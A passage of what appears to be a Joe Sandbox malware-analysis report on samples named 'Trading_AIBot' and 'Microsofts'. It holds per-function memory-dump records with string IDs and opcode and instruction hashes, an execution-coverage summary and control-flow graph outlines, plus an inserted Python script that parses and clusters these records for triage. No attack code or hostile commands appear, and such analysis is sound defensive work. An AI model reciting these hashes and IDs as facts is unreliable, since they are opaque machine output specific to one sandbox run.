                                                                                                                                        • Instruction Fuzzy Hash: DD41E0B0D012889FDB11DFA9D884ADEFFF5AF49300F14846AE404AB2A4CB74A985CF50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 836d336856dd677ff62d95e132120fb5719d3c6d617f98a193b737ec8d38d7e6
                                                                                                                                        • Instruction ID: 735c5714346aec6c91043909f352039b6d7d09430fd5be5ff7af551ff1d10aec
                                                                                                                                        • Opcode Fuzzy Hash: 836d336856dd677ff62d95e132120fb5719d3c6d617f98a193b737ec8d38d7e6
                                                                                                                                        • Instruction Fuzzy Hash: 5B51E574A40248CFDB45DFA8D994A9DBBB2FF8D314F1090A9E405AB3A5DB30AC06CF14
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2fb2d36306b4130fa54926f2020e246f11b4f2534a5be9cd2e762b0c1396ee4b
                                                                                                                                        • Instruction ID: 13182d13e97597b35a91d3ca0914cfa94cb7a9271ca33ab1fd3abb924409e7fe
                                                                                                                                        • Opcode Fuzzy Hash: 2fb2d36306b4130fa54926f2020e246f11b4f2534a5be9cd2e762b0c1396ee4b
                                                                                                                                        • Instruction Fuzzy Hash: 77B19B74A012288FDB64DF68C994B9DBBB2BF49304F1085EAD40DA7394DB70AE85CF51
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 68e46343c6f3259e4cfb185209fbf5de7783d65fc49835dad24c92145c09d6fe
                                                                                                                                        • Instruction ID: 8a09b1b087fb8b1148eac44e888d763333957ff5bdb8d645e1f0fec0a74af981
                                                                                                                                        • Opcode Fuzzy Hash: 68e46343c6f3259e4cfb185209fbf5de7783d65fc49835dad24c92145c09d6fe
                                                                                                                                        • Instruction Fuzzy Hash: 3441CC78D04208CFDB15DFE9E4986ECBBF5AB49304F14806AE829AB394DB346942CF50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ed5befaf4e67ebc4d69f70d054f501259387b519b77c3e4fc163a1bdd7bb00cb
                                                                                                                                        • Instruction ID: 487f28a7a81d7ea992731c7655a029194c0cda27b9bb7ba860c249588da67822
                                                                                                                                        • Opcode Fuzzy Hash: ed5befaf4e67ebc4d69f70d054f501259387b519b77c3e4fc163a1bdd7bb00cb
                                                                                                                                        • Instruction Fuzzy Hash: A041D1B0D012489FDB15DFAAD584ADEFFF5AF48304F14806AE414AB294DB74A985CF50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 186b5e446dabfb7ab6ba002d5a92384f7c4006399ccd71b159c77d266002e990
                                                                                                                                        • Instruction ID: 64e7ee7a5b6e38b9bb44a256d47719eece3e04efdf94d2cb8a3b659646bb36be
                                                                                                                                        • Opcode Fuzzy Hash: 186b5e446dabfb7ab6ba002d5a92384f7c4006399ccd71b159c77d266002e990
                                                                                                                                        • Instruction Fuzzy Hash: A031D275E012098FCB09DBB8C591AEEBBB2AF89304F1098A9D41577394DB35AE41CF60
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e3f6c93a2f7bd9dd6534a708c0864c876c829d9044fee0c375935cfc1e0e43a5
                                                                                                                                        • Instruction ID: fb67d54d2f40879e679f6ee87525df17e67bf03f0823814423ab6638b55eee18
                                                                                                                                        • Opcode Fuzzy Hash: e3f6c93a2f7bd9dd6534a708c0864c876c829d9044fee0c375935cfc1e0e43a5
                                                                                                                                        • Instruction Fuzzy Hash: 9321C035E012098BCB08DBB9C590AEEBBB2AF89304F5094A9D41577394DB36AD41CFA4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cd1f4ad2126aa049c6bf7c25eecaa99b0429bbb397134cc273b4aa6503a9a1d6
                                                                                                                                        • Instruction ID: 72cd5a4ee37bd7f2046395517d030a301b0cc0d181fc346e7218b3b621ae9d65
                                                                                                                                        • Opcode Fuzzy Hash: cd1f4ad2126aa049c6bf7c25eecaa99b0429bbb397134cc273b4aa6503a9a1d6
                                                                                                                                        • Instruction Fuzzy Hash: A2219D71C052458FE701AFB4D9993AE7FB0FB0A305F4458E6C095A7191DB784686CF91
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: dc53d51e06836c60ef83a2445baf03a5a600d8a2c4a21a88296869b5d85924af
                                                                                                                                        • Instruction ID: c6a4aac984395dac79a6d0355a5c32e77f353ebb08641307f94c4bcc49d1a625
                                                                                                                                        • Opcode Fuzzy Hash: dc53d51e06836c60ef83a2445baf03a5a600d8a2c4a21a88296869b5d85924af
                                                                                                                                        • Instruction Fuzzy Hash: 05010470C51219DFEB04AFB4D5583AEBFB0EB0A306F5498AA9455A32C0DB784684CF91
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: dbf5c6cd02d46b644ecc1b5209ad65767f55e48e1d84f43cba174a758eb62a1b
                                                                                                                                        • Instruction ID: 6a6e1efb793ffb5e7dbc8f587b14a572e516f3040eb7ce0e4b1cb80fd77f8d57
                                                                                                                                        • Opcode Fuzzy Hash: dbf5c6cd02d46b644ecc1b5209ad65767f55e48e1d84f43cba174a758eb62a1b
                                                                                                                                        • Instruction Fuzzy Hash: 81F0F875D002558FDB64DFA4E4986ACBFB0EF5A312F0064A6E409A32A0CB309995CF24
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: aa48ac9b4bfb28b24e7a053e0ee774abf0aa47a7ec3ea51ecfee5eaf981b89fb
                                                                                                                                        • Instruction ID: e0fbead69714a7a78818ac595fb1c9bf756b20e2977bf3b1621c737c2246bb6d
                                                                                                                                        • Opcode Fuzzy Hash: aa48ac9b4bfb28b24e7a053e0ee774abf0aa47a7ec3ea51ecfee5eaf981b89fb
                                                                                                                                        • Instruction Fuzzy Hash: 22F0E576900204DFD700EFB8D849B6DBFB4FB09705F504199E848E3361EB309981CB80
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 92abed16cd5f5dbe7617219e3bf1da9c38e74e1b220a423af3dea2de351ef42e
                                                                                                                                        • Instruction ID: d99cc9caae4e97883dbecd73047493b8f118ade2c13425d8f9abba3f739314be
                                                                                                                                        • Opcode Fuzzy Hash: 92abed16cd5f5dbe7617219e3bf1da9c38e74e1b220a423af3dea2de351ef42e
                                                                                                                                        • Instruction Fuzzy Hash: 7CE02271905288DFEB02EFB4DA156DDBFB4EB16204F0048EAE849A3280DF301F44CB92
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d35dc724902f7e7d70546c0c914650ef698a0943656dfc06e5e6463fb2c7d1f4
                                                                                                                                        • Instruction ID: 91fda071f3e9c6d7182782e3353d0253d5c5f999b97ed03b18579e99d0ef0cad
                                                                                                                                        • Opcode Fuzzy Hash: d35dc724902f7e7d70546c0c914650ef698a0943656dfc06e5e6463fb2c7d1f4
                                                                                                                                        • Instruction Fuzzy Hash: 15E01A75910208DFD744EFB8E888A59BBB4FB09705F5041A9E809A33A4EB30A985CB90
                                                                                                                                        Memory Dump Source

Execution Graph

Execution Coverage: 14.3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 57
Total number of Limit Nodes: 8

Control-flow Graph

Control-flow Graph

Graph image not reproduced; recoverable from its node list: function entry eab100, basic blocks eab100 through eab5e5. Direct calls to eab0a8, ea36d8, eab5ea, ea36e8 and ea36f8; the call at eab3a8 is drawn with five candidate targets (eab469, eab0ef, eab49d, eab100 itself and eab1a1). The original distinguishes executed from not-executed blocks by colour.
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 8ar$H`r$H`r$H`r$TJar
                                                                                                                                        • API String ID: 0-1811950289
                                                                                                                                        • Opcode ID: 9d2d55eb4891ff86e77b4649e7425ad0086330258b9729f113ca36a5d511f232
                                                                                                                                        • Instruction ID: 64308fec62bd27080c003036a5aecd8e1dcc3a794b73478f420e1bf8b6eaf05d
                                                                                                                                        • Opcode Fuzzy Hash: 9d2d55eb4891ff86e77b4649e7425ad0086330258b9729f113ca36a5d511f232
                                                                                                                                        • Instruction Fuzzy Hash: 16D1E571B002048FDB15DB68D451BAE7BB2EF8E320F245166E505EF3A2DB35ED418BA1

Control-flow Graph

Graph image not reproduced; recoverable from its node list: function entry ea3f78, basic blocks ea3f78 through ea4105, with a single call to ea3168 (at ea3fa9) and a loop over ea40af-ea40ae.
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 0o?q$Lj?q$Lj?q$PH\r$PH\r
                                                                                                                                        • API String ID: 0-3671958786
                                                                                                                                        • Opcode ID: bbdf340af475663d042942f379539b3933e8e87e7d37c702486846e9e69f99e6
                                                                                                                                        • Instruction ID: 6cb457f54fd8e612733afc0f03a70888b7cfd0c088f2f7656fa413bb3f8e08b3
                                                                                                                                        • Opcode Fuzzy Hash: bbdf340af475663d042942f379539b3933e8e87e7d37c702486846e9e69f99e6
                                                                                                                                        • Instruction Fuzzy Hash: 4E51D7B4E00208DFDB48DFAAD584A9DBBF2BF89310F109429E815BB364DB70A945CF50

Control-flow Graph

Graph image not reproduced; recoverable from its node list: function entry eaab6a, basic blocks eaab6a through eaae76. Calls to eaa428 and ea36d8; the call at eaab97 is drawn with two candidate targets (eaae88, eaae98) and the call at eaac9e with three (eab0ef, eab100, eab1a1).
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $H`r$H`r$H`r
                                                                                                                                        • API String ID: 0-3208256225
                                                                                                                                        • Opcode ID: d64a981a825e27f7941761af8e2ab92a726865dfb1c3927775f523ff1fadddd3
                                                                                                                                        • Instruction ID: 6a5fa44d282134e2c713efe7081079734f3c5f5128ede3e7a7ebaf877af3f4f5
                                                                                                                                        • Opcode Fuzzy Hash: d64a981a825e27f7941761af8e2ab92a726865dfb1c3927775f523ff1fadddd3
                                                                                                                                        • Instruction Fuzzy Hash: F181B7347003049BEF296B74945876E7693AFCA335F28462AF9169B3D0CF359D41C792

Control-flow Graph

Graph image not reproduced; recoverable from its node list: function entry ea19b8, basic blocks ea19b8 through ea26ba, with two call sites into ea02a8 (at ea1b1d and ea1b6a) and no other calls.
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: X`r$X`r$X`r$X`r
                                                                                                                                        • API String ID: 0-3954137160
                                                                                                                                        • Opcode ID: 76a2b710fb98bb842b49dba86c2d15dff1e7cde15dc546bc49b322e51ac30f38
                                                                                                                                        • Instruction ID: f6b2c3d660048435c94a4fc6f746bc85ff7f7619230145e9c1d5efdb9ba77501
                                                                                                                                        • Opcode Fuzzy Hash: 76a2b710fb98bb842b49dba86c2d15dff1e7cde15dc546bc49b322e51ac30f38
                                                                                                                                        • Instruction Fuzzy Hash: B671A331E013298FDF64DFB8C8443EEBBB6AF89300F1481A6C519B7251EB709D458B91

Control-flow Graph

Graph image not reproduced; recoverable from its node list: function entry ea2c62, basic blocks ea2c39 through ea2dc9 (the block at ea2c39 sits before the entry and loops back to it); no calls.
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: X`r$X`r
                                                                                                                                        • API String ID: 0-1096494241
                                                                                                                                        • Opcode ID: a2fa712df44aab42f3bc77b0a4f24186803d556f0acfebf6f3bb6a7dedc638ea
                                                                                                                                        • Instruction ID: 4e30a4146b03e6373bccc30db3b503c50424ea507129a2cd10f483402a98f98a
                                                                                                                                        • Opcode Fuzzy Hash: a2fa712df44aab42f3bc77b0a4f24186803d556f0acfebf6f3bb6a7dedc638ea
                                                                                                                                        • Instruction Fuzzy Hash: 13412731B043204BDF184A7D89553BEAAF6BFDA314F28503EDA02FB392DBA49C059751

Control-flow Graph

Graph image not reproduced; recoverable from its node list: function entry eab469, basic blocks eab469 through eab5e5, calling ea36e8 (at eab508) and ea36f8 (at eab5b2). Its blocks from eab4e5 onwards are the same ones that appear in the tail of the eab100 graph above.
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 8ar$TJar
                                                                                                                                        • API String ID: 0-3360347397
                                                                                                                                        • Opcode ID: c48e64b99c65dd90b7c56b116c64530d4b7fbb293bcceb9a324b03c0cd1012c6
                                                                                                                                        • Instruction ID: 4ea8cf7f6d0d516b30f097576c575c5204b5f4fd10a75b380c723da7bf23aa1a
                                                                                                                                        • Opcode Fuzzy Hash: c48e64b99c65dd90b7c56b116c64530d4b7fbb293bcceb9a324b03c0cd1012c6
                                                                                                                                        • Instruction Fuzzy Hash: 5B313731B002058FDB44EBA8C591EDDBBF2AF8D324F195591E501AF3A6DB30EC418B91
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 8ar$TJar
                                                                                                                                        • API String ID: 0-3360347397
                                                                                                                                        • Opcode ID: ed8c2bd182a41f704fda19afcb41bb7e83bc6739d50a4b0bc5e9dc7d72d06bd8
                                                                                                                                        • Instruction ID: 844f819cf5f3be991e9e6bf41b9feb489e85d8e12dd9ac59d603baa74b566d84
                                                                                                                                        • Opcode Fuzzy Hash: ed8c2bd182a41f704fda19afcb41bb7e83bc6739d50a4b0bc5e9dc7d72d06bd8
                                                                                                                                        • Instruction Fuzzy Hash: 77315631B002058FDB04EBA8C581EDDBBB2AF8D324F195591E501AF3A6DA70EC418B91
                                                                                                                                        APIs
                                                                                                                                        • LdrInitializeThunk.NTDLL(00000000), ref: 05210F0E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24195607328.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_5210000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 05bb6a47731d75a597a6fb0ca5c4e9a0931de2be6751e085a4089eb7ceb21b10
                                                                                                                                        • Instruction ID: a18b61cf84992387437a65af022cdee19b3fe1f897723c7b853199a4c8eb52b5
                                                                                                                                        • Opcode Fuzzy Hash: 05bb6a47731d75a597a6fb0ca5c4e9a0931de2be6751e085a4089eb7ceb21b10
                                                                                                                                        • Instruction Fuzzy Hash: 1E119D74E102098FDB04CBA9C484EAEBBF6FF98304F148165EC04A7205D7709885CB58
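The per-function records above are regular enough to process mechanically. The Python below is an added example written for this page, not Joe Sandbox code: it parses a handful of records copied from this report (the two functions in the 00EA0000 region that share String ID 8ar$TJar and API String ID 0-3360347397 but carry different Opcode IDs, and the LdrInitializeThunk caller in the 05210000 region), groups functions by API String ID to surface such near-duplicates, lists which API references land in which dumped region, and decodes only the two .sdmp name fields the report itself corroborates (the process index, which matches the "_6_2_" in the snapshot name, and the base address, which matches "Offset"). The positional hash comparison is a constructed heuristic for illustration; Joe Sandbox's own similarity score is not described on this page.

```python
"""Parse Joe Sandbox per-function blocks and cluster functions by shared API/string sets.

Added example for this page, not Joe Sandbox code. The only report-specific
knowledge assumed is the line layout visible in the report itself.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Records copied from this report (the second and third abridged to the fields used here).
SAMPLE = """
Strings
Memory Dump Source
• Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
Similarity
• API ID:
• String ID: 8ar$TJar
• API String ID: 0-3360347397
• Opcode ID: c48e64b99c65dd90b7c56b116c64530d4b7fbb293bcceb9a324b03c0cd1012c6
• Instruction ID: 4ea8cf7f6d0d516b30f097576c575c5204b5f4fd10a75b380c723da7bf23aa1a
• Opcode Fuzzy Hash: c48e64b99c65dd90b7c56b116c64530d4b7fbb293bcceb9a324b03c0cd1012c6
• Instruction Fuzzy Hash: 5B313731B002058FDB44EBA8C591EDDBBF2AF8D324F195591E501AF3A6DB30EC418B91
Strings
Memory Dump Source
• Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
• String ID: 8ar$TJar
• API String ID: 0-3360347397
• Opcode ID: ed8c2bd182a41f704fda19afcb41bb7e83bc6739d50a4b0bc5e9dc7d72d06bd8
• Instruction Fuzzy Hash: 77315631B002058FDB04EBA8C581EDDBBB2AF8D324F195591E501AF3A6DA70EC418B91
APIs
• LdrInitializeThunk.NTDLL(00000000), ref: 05210F0E
Memory Dump Source
• Source File: 00000006.00000002.24195607328.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 05bb6a47731d75a597a6fb0ca5c4e9a0931de2be6751e085a4089eb7ceb21b10
• Instruction Fuzzy Hash: 1E119D74E102098FDB04CBA9C484EAEBBF6FF98304F148165EC04A7205D7709885CB58
"""

FIELD_RE = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)$")
SDMP_RE = re.compile(r"^(?P<name>[0-9A-Fa-f.]+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)$")


def parse_records(text: str) -> List[dict]:
    """One dict per function block: its bullet fields plus the APIs listed just before it."""
    records, pending_apis, cur = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings"):  # header that opens the next block
            if cur is not None:
                records.append(cur)
            cur, pending_apis = None, []
        elif line == "Memory Dump Source":
            cur = {"apis": pending_apis, "fields": {}}
        elif cur is None and (m := API_RE.match(line)):
            pending_apis.append({"api": m[1], "module": m[2], "args": m[3], "ref": int(m[4], 16)})
        elif cur is not None and (m := FIELD_RE.match(line)):
            cur["fields"][m[1]] = m[2]
    if cur is not None:
        records.append(cur)
    return records


def decode_source(field: str) -> dict:
    """Decode a 'Source File' value. Only the process index (field 1) and base address
    (field 4) are interpreted, because the report corroborates both; the other dotted
    fields are returned raw rather than guessed at."""
    m = SDMP_RE.match(field)
    if not m:
        raise ValueError(f"unrecognised Source File value: {field!r}")
    parts = m["name"].split(".")
    base = int(parts[3], 16)
    if base != int(m["off"], 16):
        raise ValueError("base address in file name disagrees with Offset")
    return {"process": int(parts[0]), "base": base, "raw_fields": parts[4:8], "based_on_pe": m["pe"] == "true"}


def near_duplicate_groups(records: List[dict]) -> Dict[str, List[str]]:
    """Opcode IDs grouped by API String ID; a group with 2+ distinct IDs means functions that
    reference the same strings/APIs but hash differently, i.e. candidate near-duplicates."""
    groups = defaultdict(set)
    for r in records:
        groups[r["fields"]["API String ID"]].add(r["fields"]["Opcode ID"])
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}


def api_references(records: List[dict]) -> List[Tuple[str, str, int, int]]:
    """(module, api, call-site address, dumped region base) for every listed API reference."""
    out = []
    for r in records:
        base = decode_source(r["fields"]["Source File"])["base"]
        out.extend((a["module"], a["api"], a["ref"], base) for a in r["apis"])
    return sorted(out)


def hash_agreement(a: str, b: str) -> float:
    """Fraction of positions at which two Instruction Fuzzy Hash strings agree. Constructed,
    crude comparison for illustration only; not Joe Sandbox's similarity metric."""
    if len(a) != len(b):
        raise ValueError("hashes differ in length")
    return sum(x == y for x, y in zip(a, b)) / len(a)


def triage(text: str) -> dict:
    records = parse_records(text)
    regions = sorted({(d["process"], d["base"]) for d in
                      (decode_source(r["fields"]["Source File"]) for r in records)})
    return {"functions": len(records), "regions": regions,
            "near_duplicates": near_duplicate_groups(records), "api_refs": api_references(records)}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE), indent=2))
```

Run on the full report text, the same functions turn the thousands of similarity blocks into a short list of dumped regions, the API call sites inside each, and the sets of functions that differ only in code hash; the two 8ar$TJar records above fall into one such set.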
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LR\r
                                                                                                                                        • API String ID: 0-935051279
                                                                                                                                        • Opcode ID: ffa7e1e9c26b093ad3145a12297567ff106ebb778cdd58be43e8760200b3127c
                                                                                                                                        • Instruction ID: d74019bb9c24960b25b7592547ce017dcd029a6ee34d17a4abb9f9cc47087cf4
                                                                                                                                        • Opcode Fuzzy Hash: ffa7e1e9c26b093ad3145a12297567ff106ebb778cdd58be43e8760200b3127c
                                                                                                                                        • Instruction Fuzzy Hash: 15A1D875A10249CFCB45EFA9E9A5A9DBBB1FB88305F104929D405EB368DB306D06CF81
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LR\r
                                                                                                                                        • API String ID: 0-935051279
                                                                                                                                        • Opcode ID: 26c10a700c539027d452cac712506a51b8331bbf08443bc274373128095b2980
                                                                                                                                        • Instruction ID: 5965abc4b4a8852f0a0ba0dd17adf2ad52746da655e4d10f57174170c36a524b
                                                                                                                                        • Opcode Fuzzy Hash: 26c10a700c539027d452cac712506a51b8331bbf08443bc274373128095b2980
                                                                                                                                        • Instruction Fuzzy Hash: 98A1B875A10349CFCB45EFA9E995A9DBBB1FB88305F104929E405EB368DB306D06CF81
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: H`r
                                                                                                                                        • API String ID: 0-2871800212
                                                                                                                                        • Opcode ID: 1d5a0bc306f9ad70484f1ec265fc3a728e58700169604975160343c7721c7fc9
